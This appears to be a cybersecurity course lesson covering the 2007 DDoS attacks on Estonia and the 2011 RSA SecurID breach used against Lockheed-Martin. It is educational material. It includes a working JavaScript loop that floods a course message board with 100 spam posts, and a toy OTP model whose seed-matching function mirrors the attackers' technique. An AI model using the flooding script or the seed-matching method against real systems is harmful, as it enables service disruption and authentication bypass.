In this lesson, we'll look more in depth at two different cyber
attacks.
[Image: Statue commemorating Soviet WWII soldiers that was moved by the Estonian government, sparking attacks. (from wired.com article)]
2007 Take-down of Estonia: DDoS at the level of a nation
In 2007, the nation of Estonia was victimized by coordinated DDoS attacks against many national institutions. The Wired article referenced below gives a really nice, dramatic account of the attacks. The scope of the attacks, and the fact that it was really an attack against a nation, make this an interesting case study for us.
Estonia is a small Baltic country that used to be part of the
Soviet Union. On April 27th, 2007, the Estonian government
moved a Soviet-era memorial to the Soviet soldiers that fought
in WWII from a prominent location in downtown Tallinn to a
military cemetery in the suburbs.
This was a very contentious issue between Estonia and Russia.
In the days that followed, Estonian institutions, both
governmental and non-governmental, were targeted by a wave of
cyber attacks — predominantly DDoS attacks.
This was really an attack on the network infrastructure of the
whole nation.
Some of the attacks were carried out by "script kiddies", meaning users who are not particularly knowledgeable about hacking but who blindly follow instructions on hacker websites to carry out attacks. For example, they might copy a script that sends thousands of ping requests a second to a host. If that host is providing a service, such as DNS or a web server, it might stay so busy responding to pings that it can't provide that service. Chat rooms provided a means to encourage script kiddies to attack, to coordinate the attacks, and to give instructions on how to carry out attacks.
For example, the Wired article below quotes this post from a
Russian online forum: "You do not agree with the policy of eSStonia??? You
may think you have no influence on the situation??? You CAN
have it on the Internet!"
Another kind of DDoS attack was carried out against, for example, the Postimees (www.postimees.ee), an Estonian newspaper website. The website has message boards, and the attackers had scripts that posted spam to the message boards. This kept legitimate users out, clogged up the message boards with garbage, and ultimately brought down the site's servers. We can actually carry out this kind of attack on rona and the instructor message boards. It's quite illustrative. The instructions below tell you how to instantly post 100 new spam messages to the message board.
- Create an account on your instructor's message board and log in. (We're assuming here that you're attacking instructor wcbrown.)
- Copy the code below, paste it into the SI110 Batch Interpreter, and click "Run" to execute it.
- Now go look at the page, and you should see 100 new silly 30-word messages.
var i = 0;
while(i < 100)
{
  i = i + 1;
  // Make a silly random message
  var words=["the","rain","in","Spain","falls","mainly","on","the","plain"];
  var msg = "";
  var j = 0; while(j < 30) { msg = msg + words[Math.floor(Math.random()*9)%9]+" "; j = j + 1; }
  // Posts message to message board without navigating to the message board
  try
  {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", "http://rona.cs.usna.edu/~wcbrown/msg/mb.cgi?msg="+msg,true);
    xmlhttp.send(null)
  } catch (e)
  {
    xmlhttp=false;
  }
}
If you follow these instructions (which you should only do if
and when your prof says it's OK!) then congratulations: you're a
script kiddie! If you modified the above code to suit your own
nefarious purposes, then congratulations: you're an evil hacker!
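A defensive counterpart to the scripted spam-posting above, as an added example that is not part of the original lesson or of the course's message-board code: a per-client sliding-window rate limiter run over a constructed request log in which one address replays the 100-post loop while another posts normally. The client addresses, timings, and the limit of 5 posts per 60 seconds are assumptions.

```python
from collections import defaultdict, deque

# Constructed sample of message-board post requests as (unix_time, client_ip).
# 203.0.113.7 runs the 100-post loop in about one second; 198.51.100.4 posts normally.
REQUESTS = sorted(
    [(1000.0 + i * 0.01, "203.0.113.7") for i in range(100)]
    + [(1000.0, "198.51.100.4"), (1030.0, "198.51.100.4"), (1100.0, "198.51.100.4")]
)


class PostRateLimiter:
    """Sliding-window limit: at most `limit` posts per client in any `window` seconds."""

    def __init__(self, limit=5, window=60.0):
        self.limit, self.window = limit, window
        self.history = defaultdict(deque)   # client -> timestamps of accepted posts

    def allow(self, now, client):
        q = self.history[client]
        while q and now - q[0] >= self.window:   # drop posts that left the window
            q.popleft()
        if len(q) >= self.limit:
            return False                          # over the limit: reject, don't record
        q.append(now)
        return True


def filter_posts(requests, limit=5, window=60.0):
    """Replay a request log through the limiter; return (accepted, rejected) counts per client."""
    limiter = PostRateLimiter(limit, window)
    accepted, rejected = defaultdict(int), defaultdict(int)
    for t, client in requests:
        (accepted if limiter.allow(t, client) else rejected)[client] += 1
    return dict(accepted), dict(rejected)


if __name__ == "__main__":
    acc, rej = filter_posts(REQUESTS)
    for client in sorted(acc):
        print(f"{client}: accepted {acc[client]}, rejected {rej.get(client, 0)}")
```

The flooding client gets its first five posts through and the other 95 are dropped before they reach the board, while the normal client is unaffected.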
More serious than the script kiddies in the attacks on Estonia were the attacks from botnets: large collections of zombies, which are hosts that have been compromised by an attacker but function as usual until they receive the command to start whatever malicious activity their masters require. In this case, the botnets were used to perform DDoS attacks. The Wired article reports that in one day there were over 58 separate botnet attacks on Estonian targets. Estonia was being attacked by large numbers of hosts from Egypt, Vietnam and Peru ... not countries with a traditional interest in Estonian politics. These hosts were in fact simply zombies in a botnet.
In the face of something like this, what can be done? Since the attacks were coming from all over the world, the only thing that Estonia could do on its own was to sever its connections to the rest of the world. This is, obviously, a disaster. Addressing the problem in an acceptable way required the cooperation of many players outside of Estonia. The botnet IPs needed to be identified, and packets from them filtered out not at their target, Estonia, where the traffic was already overwhelming, but closer to their sources. ISPs around the world would have to agree to filter out traffic from the attacking IP addresses that fell within their corner of the Internet. The Wired article has an interesting section describing how that happened.
References
- Hackers Take Down the Most Wired Country in Europe, Wired, August 21, 2007.
- A look at Estonia's cyber attack in 2007, MSNBC, July 8, 2009.
- Estonia readies for the next cyberattack, Computerworld, April 7, 2010.
2011 Attack on Lockheed-Martin
In late May of 2011, Lockheed-Martin (a big defense contractor) was targeted by a cyber attack. The way in which this attack was carried out makes it an interesting case study for us. Lockheed-Martin claimed that it discovered the attack early and reacted to it quickly, with the result that no real harm was done. We have no real way to know whether or not that's accurate. In any event, what it does speak to is the importance of vigilance in network defense.
[Image: SecurID Key Fob]
The story of the Lockheed-Martin break-in starts with an idea we discussed in the Models and Tools section of the course: two-factor authentication. Recall that a "factor" in authentication can be something you know, something you are, or something you have. A two-factor authentication system requires you to present instances of two of these three to authenticate with a system. Lockheed-Martin employed a two-factor authentication system that combined a password (thing you know) with SecurID, a system produced by RSA labs that provides a "thing-you-have" factor. The way SecurID works is as follows: you get a little key fob, like the one shown to the right, that displays a number which changes every 60 seconds. Each key fob has a unique number called its seed, which determines what number is shown on the fob at any given point in time. The server stores your username, password hash and the seed value for your key fob, and this allows it to determine what number is showing on your key fob.
When you authenticate, you enter your username and regular password, then you look at the key fob and enter the number shown there. The authentication server knows what number should be shown at that time on the key fob, and so can verify that the key fob is indeed a thing you have. This is called a One Time Password (OTP) system.
This OTP two-factor authentication system is really just another instance of defense in depth. Stealing a person's password isn't enough; you've also got to steal their key fob, which is a physical thing-you-have. Thus, even if a bad guy has a key-logger on your computer, he can't really authenticate: while he'll see your password and the number you typed in from your key fob, that number is no longer valid when he tries to log in with your stolen credentials. On the other hand ...
[Image: The email used in the RSA attack (from wired.com).]
In March of 2011, someone attacked RSA with a relatively unsophisticated phishing attack. Would you open the attachment from the e-mail shown on the right? The attachment is an Excel file, and it has embedded code that exploited a zero-day vulnerability in Adobe Flash in order to set up a backdoor — a way for the attackers to get into the computer. With this access, the attackers were ultimately able to steal from RSA the seed values of we're-not-sure-how-many SecurID key fobs.
[Note: RSA has not, as far as I'm aware, admitted that any seed values were stolen. However, there seems to be overwhelming evidence that they were.]
While RSA admitted at the time that the attack took place, they wouldn't specify what, if anything, had been compromised, and they claimed that the attack would not allow a "direct attack" on SecurID. Presumably their rationale was that the seed values alone weren't enough to attack authentication, because you would have to be able to match a seed value with a particular account, i.e. you'd have to know the system it was used to log in to and the username on that system for the individual with the key fob. If this was their logic, it was flawed, as we will see below. Either that, or they were playing semantic games with the phrase "direct attack".

Notice the overlap with many of the aspects of security we have addressed in this course:
- Phishing: employee action (opening an email attachment) inadvertently let the attackers in.
- Zero-day: an Adobe Flash buffer overflow vulnerability was exploited.
- Trojan: the exploit allowed a key logger to be installed (PoisonIvy).
- Authentication compromised: unprivileged credentials were obtained.
- Privilege escalation: sysadmin and service account credentials obtained.
- Encryption: stolen data was encrypted by the attackers!
- Conclusion: attackers deleted files to destroy evidence of the attack.
Then, in late May of 2011, the action moved to
Lockheed-Martin. Attackers managed to get a keylogger on a
host belonging to someone who worked for the company.
The key-logger recorded the username,
password and SecurID one-time-passwords (OTPs) used by the victim
when he authenticated, along with the date/time of the
login. This is just the kind of scenario two-factor
authentication is designed for. The attacker can't
authenticate, because knowing the username, password and an
old OTP isn't enough: the current OTP is required.
However ... these attackers had the stolen seed
values. For a given seed value and date/time, they could
calculate the number the key fob with that seed value would
display at that date/time. All they had to do was to write
a program that would compute, for every stolen seed value, the
number that would've been showing at the date/time their
keylogger recorded the victim's login. Once they found a
match with the OTP the key-logger recorded, they'd have
matched a seed value with a username, at which point it was
as if they actually had the key fob themselves. Whether
exactly via this method or not, the
attackers were able to authenticate on Lockheed-Martin's
system with a valid username, password and SecurID OTP.
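A worked model of the seed-plus-time scheme described under SecurID above and of the seed-matching step just described, as an added example that is not code from the lesson or from RSA: it uses an HMAC-SHA1 construction in the style of RFC 6238 as a stand-in for the proprietary SecurID algorithm, with constructed seeds and a constructed login time. The server-side check shows why a keylogged OTP is useless on its own, and match_seed shows why the seed database is as sensitive as the fobs themselves.

```python
import hashlib, hmac, struct

STEP_SECONDS = 60   # as on the page: the fob's number changes every 60 seconds
DIGITS = 6


def otp_for(seed: bytes, unix_time: int) -> str:
    """Number a fob with this seed shows at unix_time. Toy HMAC-SHA1 construction
    in the style of RFC 6238; assumption: the real SecurID algorithm is proprietary
    and is NOT what is implemented here."""
    counter = unix_time // STEP_SECONDS
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10**DIGITS:0{DIGITS}d}"


class OtpServer:
    """Server side: knows each user's seed, accepts an OTP only for the current
    60-second window, and accepts each window at most once per user."""

    def __init__(self, seeds_by_user):
        self.seeds = dict(seeds_by_user)
        self.last_window = {}   # highest window already accepted, per user

    def verify(self, user, otp, now):
        seed = self.seeds.get(user)
        window = now // STEP_SECONDS
        if seed is None or self.last_window.get(user, -1) >= window:
            return False        # unknown user, or a keylogged OTP replayed in its own window
        if not hmac.compare_digest(otp_for(seed, now), otp):
            return False        # wrong number, e.g. an OTP recorded in an earlier window
        self.last_window[user] = window
        return True


def match_seed(seed_db, login_time, recorded_otp):
    """The step the page describes: given the seed database and one recorded
    (login time, OTP) pair, which seed(s) produce that OTP at that time? One
    keylogged login ties a seed to a username, so the seed database must be
    protected at least as carefully as the fobs themselves."""
    return [s for s in seed_db if otp_for(s, login_time) == recorded_otp]


if __name__ == "__main__":
    seeds = {"alice": b"constructed-seed-alice", "bob": b"constructed-seed-bob"}  # constructed
    t_login = 1_306_800_000                                                        # constructed
    server, seen = OtpServer(seeds), otp_for(seeds["alice"], t_login)
    print("login at t:", server.verify("alice", seen, t_login))                  # True
    print("same OTP, 2 minutes later:", server.verify("alice", seen, t_login + 120))  # False
    print("seeds matching recorded OTP:", match_seed(seeds.values(), t_login, seen))
```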
Lockheed-Martin claims to have recognized very quickly that
their authentication was compromised and taken steps to
secure their system. In particular they said that no
important data was lost. Whether to believe that is up to
you. The problem is that, as with RSA, companies do not
like to confess that they've been hacked or that a breach is
serious. At least two other companies were attacked this
same way using the stolen RSA seed values. RSA was forced
to admit that the seed values had indeed been stolen, and
decided it would replace every one of the
SecurID tokens (key fobs and other similar
devices). All 40 million of them. There are some very
interesting aspects of this attack that are worth thinking
about.
- Trust — Lockheed-Martin was relying not only on the security of RSA's product (SecurID), but also on the security of RSA's own IT infrastructure and its ability to protect the seed values. Its trust in the security of RSA's own IT infrastructure was evidently misplaced. In general, one has to be careful about trust, and minimize the trust you are forced to place in the security of other entities to maintain your own security.
"I think one of the things that this incident shows us is that a business model where an enterprise is trusting a third party to hold their seeds is potentially very risky. There's a certain amount of risk that they have to calculate. If you're a small organization or don't have the resources to do it better in-house, you're going to probably go that route. If you're a large organization, you might want to look to other alternatives. There are other models where you don't have to give your seeds to someone else."
— Rick Moy, CEO of NSS Labs, [7]
- Defense-in-Depth —
This story demonstrates, once again, that a single line
of defense is a bad design, no matter how hard you try
to secure that line completely and perfectly.
If Lockheed-Martin is indeed being forthcoming, they had
other measures in place that discovered and/or thwarted
this attack. In other words they had defense in depth.
So, if you like, the fact that the attackers got a
keylogger on a system inside Lockheed-Martin and still
weren't able to do any real damage is a positive.
"Much of the concern has to do with this lingering tendency to see
security in black-and-white terms: We are either secure, or we're
not. The tendency to see security in black-and-white terms
may also tend towards 'betting the farm' thinking, where one defense
tactic or another is seen as critical."
— Scott Crawford, analyst for Enterprise Management Associates,
[7]
"The traditional OTP [One Time Password] approach only provides a
single layer of protection at the perimeter, which APTs
[Advanced Persistent Threats] can get
around. To secure your environment against these hacks, customers need
to look at a multilayered approach, protecting at different points
within the network."
— Chris Harget, senior product marketing manager at ActivIdentity,
[7]
- Evolving Threats — The complexity of carrying out this attack was considerable. The perpetrators had to break into systems in at least two different organizations, both of which take security seriously. They had to actually find their way to the seed values at RSA, and then have the necessary understanding of the seed+time-to-OTP algorithm to find the proper seed for the user at Lockheed-Martin they'd attacked. The sophistication of the attack and the nature of the targets make corporate or government espionage seem likely. This is not the teenage-hacker-in-the-basement-of-his-parents'-house scenario.
"Malware has evolved from a trivial, script-kiddie nuisance, to a professional crime syndicate, and now into a tool for precision corporate and government espionage."
— Tony Bradley, a PC World columnist, [2]
References
- Lockheed Martin Suffers Massive Cyberattack, InformationWeek, May 31, 2011.
- How bad was the cyber attack on Lockheed Martin?, Christian Science Monitor, May 29, 2011.
- RSA Details SecurID Attack Mechanics, InformationWeek, April 04, 2011.
- RSA finally comes clean: SecurID is compromised, Ars Technica, June 2011.
- Researchers Uncover RSA Phishing Attack, Hiding in Plain Sight, Wired, August 26, 2011.
- After the Cyber Attack on Lockheed Martin, What's the Future of RSA SecurID?, Popular Mechanics, June 3, 2011.
- Gauging The Long-Term Effects Of RSA's Breach, Dark Reading, Nov 14, 2011.
- China Hacked RSA, U.S. Official Says, Dark Reading, Mar 29, 2012.
And so on and so forth ...
Cyber attacks are happening all the time. You don't even have to keep your eyes very wide open to find them in the news. Here are a few things ... not necessarily the most important, just what we happened to see.
Anonymous Waging War?
For the most part, it takes a nation to wage war on another nation. Who else has tanks and fighter planes and a place to keep them? But in the cyber-domain, any group with the will and know-how can carry out attacks, and that includes attacks on the assets of governments. Here are two recent stories about the hacktivist collective "Anonymous" doing just that:
- Yahoo News, Global hacking network declares Internet war on Syria
- NY Times, Anonymous Attacks Israeli Web Sites